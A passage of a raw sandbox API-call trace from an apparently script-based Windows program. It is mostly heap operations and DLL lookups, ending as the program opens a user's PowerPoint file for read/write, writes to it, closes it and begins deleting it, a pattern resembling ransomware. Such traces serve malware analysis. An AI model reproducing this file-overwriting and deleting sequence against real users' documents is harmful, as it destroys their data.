HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0168.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.944] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0168.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.946] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0168.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c28e8 [0168.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c28e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0168.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.947] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0168.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.948] FreeLibrary (hLibModule=0x75c90000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0168.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.950] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.950] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0168.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0168.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.951] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0168.952] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dxjhietg4klttzj3vc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0168.953] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.953] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.953] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.953] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.953] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0168.953] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.953] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.955] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.955] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.955] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.955] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.955] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0168.955] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.955] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.956] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.956] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.982] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx", lpFilePart=0x0) returned 0x3f [0168.983] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0xa0e9280, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 0x90af58 [0168.983] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 